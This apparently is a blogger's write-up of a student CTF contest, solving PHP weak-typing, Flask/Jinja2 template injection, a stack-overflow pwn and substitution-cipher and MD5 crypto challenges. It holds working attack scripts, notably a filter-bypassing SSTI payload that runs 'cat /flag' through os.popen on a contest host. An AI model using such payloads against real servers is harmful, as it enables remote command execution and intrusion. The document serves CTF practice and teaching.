
GDOUCTF Freshman Contest Writeup

Author: yulate
Published 2023-05-09 11:28:56

Final result

I played alone for one day. The web challenges were far too easy: solving all of them (AK) was worth less than a single misc challenge. I only know a little about the other categories, so in the end I finished in 115th place.


WEB

受不了一点

A classic PHP weak-typing challenge.

```php
<?php
error_reporting(0);
header("Content-type:text/html;charset=utf-8");
if (isset($_POST['gdou']) && isset($_POST['ctf'])) {
    $b = $_POST['ctf'];
    $a = $_POST['gdou'];
    // the two values must differ, yet md5() of each must be strictly (===) identical
    if ($_POST['gdou'] != $_POST['ctf'] && md5($a) === md5($b)) {
        if (isset($_COOKIE['cookie'])) {
            if ($_COOKIE['cookie'] == 'j0k3r') {
                if (isset($_GET['aaa']) && isset($_GET['bbb'])) {
                    $aaa = $_GET['aaa'];
                    $bbb = $_GET['bbb'];
                    // loose (==) comparison with 114514, while the two values must not equal each other
                    if ($aaa == 114514 && $bbb == 114514 && $aaa != $bbb) {
                        $give = 'cancanwordflag';
                        $get = 'hacker!';
                        if (!isset($_GET['flag']) && !isset($_POST['flag'])) {
                            die($give);
                        }
                        if ($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag') {
                            die($get);
                        }
                        // variable variables: every POST key becomes a PHP variable holding its value
                        foreach ($_POST as $key => $value) {
                            $$key = $value;
                        }
                        // every GET key becomes a variable holding the value of the variable named by its value
                        foreach ($_GET as $key => $value) {
                            $$key = $$value;
                        }
                        echo $f1ag;
                    } else {
                        echo "洗洗睡吧";
                    }
                } else {
                    echo "行不行啊细狗";
                }
            }
        } else {
            echo '菜菜';
        }
    } else {
        echo "就这?";
    }
} else {
    echo "别来沾边";
}
?>
```

hate eat snake

After the snake runs into the wall, a prompt appears: click Cancel and then just wait 60 seconds.


EZ WEB

Send a PUT request to the /super-secret-route-nobody-will-guess route and you get the flag.


A Flask Jinja2 template-injection challenge. The characters . and _ are filtered, which is bypassed with attr and the ~ operator.

```python
import requests

url = "http://node6.anna.nssctf.cn:28986/get_flag"

def getstr(s1):
    # Build a Jinja2 expression that evaluates to the string s1 without writing
    # quotes, dots or underscores: ((i~i~...)%(c1,c2,...)), where the loop
    # variable i is bound to "%c" and % is Python's printf-style formatting.
    i1 = ""
    s5 = ""
    for i in s1:
        i1 += "i~"
        s5 += str(ord(i)) + ","
    i1 = i1.strip("~")
    s5 = s5.strip(",")
    s = f"(({i1})%({s5}))"
    return s

# The for loop binds i to "%c": g|lower|list|first|urlencode|first gives "%"
# (from "<" url-encoded as "%3C") and ...|last|lower gives "c".
payload2 = """{% for i in ( ((g|lower|list|first|urlencode|first)~(g|lower|list|first|urlencode|last|lower)),) %}{% print ( """ + f"""lipsum|attr({getstr("__globals__")})|attr({getstr("__getitem__")})({getstr("os")})|attr({getstr("popen")})({getstr("cat /flag")})|attr({getstr("read")})()""" + """ ) %}{% endfor %}"""

data = {"name": payload2}

resp = requests.post(url=url, data=data)
print(resp.text)
```

PWN

EASY PWN


In this particular program, the way to make sure print_flag() is executed is to overwrite the s1 array. Specifically, because s1 is allocated on the stack below the buf array, sending a string much longer than s1 overflows it and overwrites buf and the v5 variable, so that the program goes on to execute print_flag().

```python
from pwn import *

# p = process('./easypwn')
p = remote('node5.anna.nssctf.cn', 28202)
p.recvuntil(b'Password:')
p.sendline(b'A' * 30)  # overflow s1 so that buf and v5 are overwritten
print(p.recvall().decode())
```

After receiving the "Password:" prompt, we send "A" * 30, a string longer than the s1 array, which overwrites buf and v5 so that the program executes print_flag(). Finally, recvall() reads the program's output and prints it to the console.


Crypto

Encryptor

The JS encryption code is as follows:

```javascript
let messagetoEncrypt = prompt("Enter a string: ").toLowerCase();
let charArray = messagetoEncrypt.split("");
let encryptedString = "";
let hasInvalidCharacter = false;

for (let i = 0; i < charArray.length; i++) {
    switch (charArray[i]) {
        case 'a':
            encryptedString = encryptedString.concat('!')
            break;
        case 'b':
            encryptedString = encryptedString.concat('1')
            break;
        case 'c':
            encryptedString = encryptedString.concat(')')
            break;
        case 'd':
            encryptedString = encryptedString.concat('v')
            break;
        case 'e':
            encryptedString = encryptedString.concat('m')
            break;
        case 'f':
            encryptedString = encryptedString.concat('+')
            break;
        case 'g':
            encryptedString = encryptedString.concat('q')
            break;
        case 'h':
            encryptedString = encryptedString.concat('0')
            break;
        case 'i':
            encryptedString = encryptedString.concat('c')
            break;
        case 'j':
            encryptedString = encryptedString.concat(']')
            break;
        case 'k':
            encryptedString = encryptedString.concat('(')
            break;
        case 'l':
            encryptedString = encryptedString.concat('}')
            break;
        case 'm':
            encryptedString = encryptedString.concat('[')
            break;
        case 'n':
            encryptedString = encryptedString.concat('8')
            break;
        case 'o':
            encryptedString = encryptedString.concat('5')
            break;
        case 'p':
            encryptedString = encryptedString.concat('$')
            break;
        case 'q':
            encryptedString = encryptedString.concat('*')
            break;
        case 'r':
            encryptedString = encryptedString.concat('i')
            break;
        case 's':
            encryptedString = encryptedString.concat('>')
            break;
        case 't':
            encryptedString = encryptedString.concat('#')
            break;
        case 'u':
            encryptedString = encryptedString.concat('<')
            break;
        case 'v':
            encryptedString = encryptedString.concat('?')
            break;
        case 'w':
            encryptedString = encryptedString.concat('o')
            break;
        case 'x':
            encryptedString = encryptedString.concat('^')
            break;
        case 'y':
            encryptedString = encryptedString.concat('-')
            break;
        case 'z':
            encryptedString = encryptedString.concat('_')
            break;
        case '0':
            encryptedString = encryptedString.concat('h')
            break;
        case '1':
            encryptedString = encryptedString.concat('w')
            break;
        case '2':
            encryptedString = encryptedString.concat('e')
            break;
        case '3':
            encryptedString = encryptedString.concat('9')
            break;
        case '4':
            encryptedString = encryptedString.concat('g')
            break;
        case '5':
            encryptedString = encryptedString.concat('z')
            break;
        case '6':
            encryptedString = encryptedString.concat('d')
            break;
        case '7':
            encryptedString = encryptedString.concat('~')
            break;
        case '8':
            encryptedString = encryptedString.concat('=')
            break;
        case '9':
            encryptedString = encryptedString.concat('x')
            break;
        case '!':
            encryptedString = encryptedString.concat('j')
            break;
        case '@':
            encryptedString = encryptedString.concat(':')
            break;
        case '#':
            encryptedString = encryptedString.concat('4')
            break;
        case '$':
            encryptedString = encryptedString.concat('b')
            break;
        case '%':
            encryptedString = encryptedString.concat('`')
            break;
        case '^':
            encryptedString = encryptedString.concat('l')
            break;
        case '&':
            encryptedString = encryptedString.concat('3')
            break;
        case '*':
            encryptedString = encryptedString.concat('t')
            break;
        case '(':
            encryptedString = encryptedString.concat('6')
            break;
        case ')':
            encryptedString = encryptedString.concat('s')
            break;
        case '_':
            encryptedString = encryptedString.concat('n')
            break;
        case '+':
            encryptedString = encryptedString.concat(';')
            break;

        case '-':
            encryptedString = encryptedString.concat('\'')
            break;
        case '=':
            encryptedString = encryptedString.concat('r')
            break;
        case '`':
            encryptedString = encryptedString.concat('k')
            break;
        case '~':
            encryptedString = encryptedString.concat('p')
            break;
        case '{':
            encryptedString = encryptedString.concat('\"')
            break;
        case '}':
            encryptedString = encryptedString.concat('&')
            break;
        case '[':
            encryptedString = encryptedString.concat('/')
            break;
        case ']':
            encryptedString = encryptedString.concat('\\')
            break;
        case '|':
            encryptedString = encryptedString.concat('2')
            break;
        case ':':
            encryptedString = encryptedString.concat('.')
            break;
        case ';':
            encryptedString = encryptedString.concat('%')
            break;
        case '\"':
            encryptedString = encryptedString.concat('|')
            break;
        case '\'':
            encryptedString = encryptedString.concat(',')
            break;
        case '<':
            encryptedString = encryptedString.concat('@')
            break;
        case '>':
            encryptedString = encryptedString.concat('{')
            break;
        case ',':
            encryptedString = encryptedString.concat('u')
            break;
        case '.':
            encryptedString = encryptedString.concat('7')
            break;
        case '?':
            encryptedString = encryptedString.concat('y')
            break;
        case '/':
            encryptedString = encryptedString.concat('a')
            break;

        default:
            hasInvalidCharacter = true;
    }
}

if (hasInvalidCharacter) {
    encryptedString = "Invalid String!";
} else {
    console.log(`Your encoded string is ${encryptedString}`);
}
```
Alice used the script to send Bob the following message. It is written in JS, and Bob knows nothing about JS. Can you help him read the message?

+}!q")hiim)#}-nvm)i-$#mvn#0mnbm)im#n+}!qnm8)i-$#mvnoc#0nz<$9inm!>-n1:1-nm8)i-$~c58n!}qhij#0[noic##m8nc8n?!8c}w!n]>&

Decryption script

```python
import re

# ciphertext character -> plaintext character, built from the case/concat pairs in Encryptor.js
enc = {}

def quoted(s):
    """Return the content of the first single-quoted literal in s, unescaping \\', \\" and \\\\."""
    m = re.search(r"'((?:\\.|[^'\\])*)'", s)
    if m is None:
        return None
    return m.group(1).replace("\\'", "'").replace('\\"', '"').replace("\\\\", "\\")

with open("./Encryptor.js", "r") as f:
    for line in f:
        if "case" in line:
            next_line = next(f, None)  # the concat('...') line that follows each case
            if next_line is None:
                break
            enc[quoted(next_line)] = quoted(line)

print(enc)

js = """+}!q")hiim)#}-nvm)i-$#mvn#0mnbm)im#n+}!qnm8)i-$#mvnoc#0nz<$9inm!>-n1:1-nm8)i-$~c58n!}qhij#0[noic##m8nc8n?!8c}w!n]>&"""

result = ""

for i in js:
    result += enc.get(i, "")  # characters not in the table are dropped

print(result)
```
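The switch above is a one-to-one substitution between two 67-character alphabets, so it can be inverted with a plain translation table instead of parsing the JS file. The following is an added example, not part of the original write-up: both alphabets are transcribed inline from the switch statement, the table is checked to be a bijection, and the message quoted in the challenge is decoded. Note that the plaintext alphabet has no backslash and the cipher alphabet has no letter f, so each direction rejects input outside its own alphabet, just as the JS reports "Invalid String!".

```python
# Added example: decode the Encryptor.js substitution cipher without parsing the JS.
# PLAIN[i] is encrypted as CIPHER[i]; both strings are transcribed from the switch
# statement (the JS lowercases its input first, so upper-case letters never occur).
PLAIN = ("abcdefghijklmnopqrstuvwxyz"
         "0123456789"
         "!@#$%^&*()_+-=`~{}[]|:;\"'<>,.?/")
CIPHER = ("!1)vm+q0c](}[85$*i>#<?o^-_"
          "hwe9gzd~=x"
          "j:4b`l3t6sn;'rkp\"&/\\2.%|,@{u7ya")

# The message Alice sent, as quoted in the challenge text.
MESSAGE = '+}!q")hiim)#}-nvm)i-$#mvn#0mnbm)im#n+}!qnm8)i-$#mvnoc#0nz<$9inm!>-n1:1-nm8)i-$~c58n!}qhij#0[noic##m8nc8n?!8c}w!n]>&'


def table_is_bijection():
    """True when every plaintext char has exactly one cipher char and vice versa."""
    return (len(PLAIN) == len(CIPHER)
            and len(set(PLAIN)) == len(PLAIN)
            and len(set(CIPHER)) == len(CIPHER))


def encrypt(text):
    """Mirror of the JS: lowercase, then substitute; None if any char is unmapped."""
    text = text.lower()
    if any(c not in PLAIN for c in text):
        return None  # the JS prints "Invalid String!" in this case
    return text.translate(str.maketrans(PLAIN, CIPHER))


def decrypt(cipher_text):
    """Invert the substitution; characters the JS can never emit raise ValueError."""
    unknown = [c for c in cipher_text if c not in CIPHER]
    if unknown:
        raise ValueError(f"not produced by Encryptor.js: {unknown!r}")
    return cipher_text.translate(str.maketrans(CIPHER, PLAIN))


if __name__ == "__main__":
    assert table_is_bijection()
    print(decrypt(MESSAGE))
    print(encrypt(decrypt(MESSAGE)) == MESSAGE)
```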

babylua

```lua
local flag = '' -- this is the flag you have to recover
local md5 = require("md5")

-- random seed
math.randomseed(os.time())

local function randomStr(len)
    local rankStr = ""
    local randNum = 0
    for i = 1, len do
        randNum = math.random(1, 2)
        if randNum == 1 then
            rankStr = rankStr .. string.char(math.random(65, 90))
        elseif randNum == 2 then
            rankStr = rankStr .. string.char(math.random(97, 122))
        end
    end
    return rankStr
end

local seed = randomStr(4)
local key = md5.sumhexa(md5.sumhexa(seed))
print(key:sub(1,10))

secret = {}

for i = 1, #flag do
    secret[i] = string.byte(flag:sub(i,i)) + string.byte(key:sub(i,i))
end

for i, v in ipairs(secret) do
    io.write(v, ' ')
end

print()

-- program output:
--b5e62abe84
--200 161 198 157 173 169 199 150 105 163 193 175 173 194 135 131 135 225
-- analyse the code and recover the flag
```

A Lua challenge: a random four-character string of upper- and lower-case letters is MD5-hashed twice to produce the key, and then the ASCII value of each flag character is added to the ASCII value of the corresponding key character. A short Python script reverses it.

```python
import hashlib
from itertools import product

target = "b5e62abe84"  # first 10 hex chars of the key, as printed by the Lua program

letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"  # randomStr() alphabet

# the 18 numbers printed by the Lua program: secret[i] = flag[i] + key[i]
base_ascii = [200, 161, 198, 157, 173, 169, 199, 150, 105, 163, 193, 175, 173, 194, 135, 131, 135, 225]

def double_md5(seed):
    # key = md5.sumhexa(md5.sumhexa(seed)) in the Lua code
    return hashlib.md5(hashlib.md5(seed.encode()).hexdigest().encode()).hexdigest()

def get_key():
    # brute-force the 4-letter seed (52**4 candidates) by matching the printed prefix
    for chars in product(letters, repeat=4):
        seed = "".join(chars)
        key = double_md5(seed)
        if key[:10] == target:
            print("seed: " + seed)
            return key
    return None

# full key (hard-coded by the author; get_key() finds it by brute force)
key = "b5e62abe84bc8afbfd97c91a15aa0867"
key_ascii = [ord(c) for c in key[:len(base_ascii)]]
print(key_ascii)

result = [base_ascii[i] - key_ascii[i] for i in range(len(base_ascii))]
print(result)
print(''.join(chr(i) for i in result))
```


Originally published 2023-05-06 on the author's personal site/blog.
